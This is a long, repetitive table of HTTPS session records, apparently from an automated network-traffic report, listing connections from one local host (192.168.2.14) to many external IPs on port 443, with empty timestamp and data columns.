                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21183192.168.2.143927275.73.237.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21184192.168.2.1441208120.68.177.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21185192.168.2.144697647.9.11.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21186192.168.2.1440774165.110.125.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21187192.168.2.1439300169.41.237.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21188192.168.2.143381048.239.100.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21189192.168.2.145429251.93.129.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21190192.168.2.1436894194.80.187.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21191192.168.2.1453684182.206.64.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21192192.168.2.143872069.133.10.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21193192.168.2.14334204.33.255.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21194192.168.2.1446502194.184.225.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21195192.168.2.1438948170.111.118.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21196192.168.2.144988496.71.190.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21197192.168.2.144471436.15.68.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21198192.168.2.144431871.231.35.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21199192.168.2.145105212.123.134.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21200192.168.2.1448336107.10.206.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21201192.168.2.1435958178.179.135.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21202192.168.2.1443666131.72.17.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21203192.168.2.1435904194.243.40.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21204192.168.2.1458762101.68.17.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21205192.168.2.145282647.107.223.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21206192.168.2.1442410136.248.150.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21207192.168.2.1437756114.51.30.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21208192.168.2.146033047.244.251.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21209192.168.2.1456224108.227.145.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21210192.168.2.145308092.150.212.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21211192.168.2.1436976120.245.40.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21212192.168.2.143322283.183.204.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21213192.168.2.145971259.91.66.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21214192.168.2.1434908101.41.110.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21215192.168.2.1435886207.58.17.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21216192.168.2.1458832150.200.184.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21217192.168.2.1435882206.246.148.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21218192.168.2.1453728167.4.172.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21219192.168.2.143777090.209.88.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21220192.168.2.1458230218.6.3.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21221192.168.2.1445278140.173.239.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21222192.168.2.144151657.151.70.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21223192.168.2.1460888185.174.224.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21224192.168.2.1442488124.106.190.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21225192.168.2.1433230167.17.61.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21226192.168.2.1442800184.65.1.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21227192.168.2.1456404139.204.40.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21228192.168.2.1441948157.222.232.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21229192.168.2.1447324189.236.84.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21230192.168.2.1435308103.195.75.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21231192.168.2.1450278209.184.202.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21232192.168.2.1450416182.252.219.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21233192.168.2.145675025.33.162.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21234192.168.2.145682680.119.56.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21235192.168.2.1443310169.207.217.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21236192.168.2.144005666.67.86.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21237192.168.2.1453696105.156.167.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21238192.168.2.1452256141.98.191.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21239192.168.2.1459244133.52.225.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21240192.168.2.1451884122.201.84.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21241192.168.2.144012437.27.188.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21242192.168.2.1450532114.89.214.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21243192.168.2.144998613.47.138.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21244192.168.2.1451116183.41.153.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21245192.168.2.143607650.125.189.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21246192.168.2.1437518145.30.107.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21247192.168.2.145294684.39.102.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21248192.168.2.144490687.103.159.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21249192.168.2.143536087.206.83.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21250192.168.2.1449838113.150.213.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21251192.168.2.1444966223.2.64.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21252192.168.2.1449182191.71.85.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21253192.168.2.144819076.49.136.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21254192.168.2.1453540141.103.77.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21255192.168.2.1455084187.233.25.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21256192.168.2.1457730118.191.146.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21257192.168.2.143777890.22.84.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21258192.168.2.145094488.15.76.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21259192.168.2.1450052122.238.140.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21260192.168.2.144236471.76.96.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21261192.168.2.1442008205.168.81.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21262192.168.2.143434836.9.97.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21263192.168.2.1445564149.101.152.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21264192.168.2.1444218195.69.218.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21265192.168.2.1455878120.165.176.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21266192.168.2.1444222134.248.237.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21267192.168.2.1453460124.71.223.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21268192.168.2.143315685.104.174.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21269192.168.2.1435370103.168.56.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21270192.168.2.145837245.66.174.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21271192.168.2.1433206122.52.148.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21272192.168.2.145866078.78.75.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21273192.168.2.1447884178.51.99.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21274192.168.2.143638890.99.41.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21275192.168.2.1447978194.233.70.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21276192.168.2.145283843.196.18.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21277192.168.2.1451422198.188.46.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21278192.168.2.1445896116.120.139.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21279192.168.2.1433534136.30.105.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21280192.168.2.1439974161.185.252.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21281192.168.2.1455914103.67.222.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21282192.168.2.1440250206.217.96.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21283192.168.2.1460822116.215.186.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21284192.168.2.145469014.72.170.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21285192.168.2.1446796204.209.92.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21286192.168.2.143747267.189.217.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21287192.168.2.1435894110.123.162.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21288192.168.2.143808440.32.107.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21289192.168.2.145858682.151.139.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21290192.168.2.1455488223.56.198.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21291192.168.2.145390814.88.14.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21292192.168.2.1439626208.35.103.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21293192.168.2.1460232169.105.159.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21294192.168.2.143762296.64.39.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21295192.168.2.144242687.32.202.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21296192.168.2.145688034.146.107.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21297192.168.2.146085690.165.109.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21298192.168.2.14427348.41.82.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21299192.168.2.1438622182.93.85.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21300192.168.2.145548644.122.138.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21301192.168.2.1441738115.142.203.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21302192.168.2.1451954137.241.186.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21303192.168.2.1435952197.92.98.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21304192.168.2.145425837.170.79.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21305192.168.2.1447104147.202.248.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21306192.168.2.144368624.173.118.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21307192.168.2.1448680134.65.43.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21308192.168.2.1458382167.108.37.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21309192.168.2.145608695.216.131.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21310192.168.2.1433864221.197.100.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21311192.168.2.1443718138.113.127.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21312192.168.2.1446248133.187.114.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21313192.168.2.1453968135.118.43.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21314192.168.2.1439996115.124.175.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21315192.168.2.144028052.68.163.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21316192.168.2.145957250.135.179.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21317192.168.2.1438012190.102.72.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21318192.168.2.1457216112.148.202.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21319192.168.2.144090298.47.39.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21320192.168.2.144017473.22.107.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21321192.168.2.144659046.234.254.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21322192.168.2.145217873.199.149.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21323192.168.2.1441030193.228.114.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21324192.168.2.1441024122.38.222.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21325192.168.2.1437998161.153.10.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21326192.168.2.1460282135.205.106.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21327192.168.2.145721452.130.137.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21328192.168.2.1439880194.61.114.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21329192.168.2.1459698136.61.72.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21330192.168.2.144466285.177.200.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21331192.168.2.1435702186.31.193.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21332192.168.2.1454358123.67.251.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21333192.168.2.1450478148.251.213.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21334192.168.2.1457490161.29.231.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21335192.168.2.144548040.164.140.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21336192.168.2.1457762173.207.86.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21337192.168.2.1444056132.140.71.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21338192.168.2.1458698197.43.48.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21339192.168.2.144525873.244.46.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21340192.168.2.144568858.88.14.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21341192.168.2.1439504132.186.185.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21342192.168.2.1444060212.150.136.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21343192.168.2.1454480178.224.197.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21344192.168.2.143664476.153.31.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21345192.168.2.144602077.115.138.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21346192.168.2.1433024184.233.8.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21347192.168.2.143846239.170.115.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21348192.168.2.1455872133.67.123.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21349192.168.2.1447974114.164.110.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21350192.168.2.144116242.194.254.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21351192.168.2.143465492.98.113.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21352192.168.2.1436184196.177.183.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21353192.168.2.143516413.13.186.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21354192.168.2.144313819.220.205.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21355192.168.2.145654466.19.24.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21356192.168.2.1439652131.159.135.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21357192.168.2.1441476190.126.41.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21358192.168.2.1445074105.101.200.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21359192.168.2.145326018.253.227.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21360192.168.2.1449394157.45.110.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21361192.168.2.145737450.204.50.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21362192.168.2.1443144193.237.249.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21363192.168.2.145080482.124.128.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21364192.168.2.1446588216.174.31.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21365192.168.2.1438472178.123.112.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21366192.168.2.1440198144.210.127.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21367192.168.2.145281660.225.11.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21368192.168.2.14554109.58.15.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21369192.168.2.143893269.241.206.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21370192.168.2.145417492.222.26.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21371192.168.2.1458878100.199.90.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21372192.168.2.143585052.16.207.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21373192.168.2.1451934153.106.245.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21374192.168.2.1440166152.166.129.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21375192.168.2.1452562169.17.63.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21376192.168.2.1454026142.220.57.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21377192.168.2.146068268.76.87.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21378192.168.2.144249497.253.229.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21379192.168.2.1451012216.210.166.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21380192.168.2.144342090.55.191.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21381192.168.2.1441536219.218.35.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21382192.168.2.145103457.200.96.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21383192.168.2.143288057.205.241.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21384192.168.2.144716058.24.244.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21385192.168.2.1460678190.195.202.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21386192.168.2.1453796136.26.43.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21387192.168.2.1448842112.67.129.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21388192.168.2.1440554143.57.33.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21389192.168.2.1450594169.0.25.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21390192.168.2.1453228108.241.117.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21391192.168.2.145726279.59.166.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21392192.168.2.1454154119.38.72.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21393192.168.2.145897279.159.191.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21394192.168.2.1447146191.216.99.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21395192.168.2.143638260.154.146.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21396192.168.2.1460720167.88.146.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21397192.168.2.144440850.147.30.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21398192.168.2.145302484.111.138.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21399192.168.2.1433040210.88.129.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21400192.168.2.144356682.241.70.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21401192.168.2.1447152183.128.225.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21402192.168.2.144335262.35.2.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21403192.168.2.1435826181.248.93.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21404192.168.2.1455306196.253.85.214443
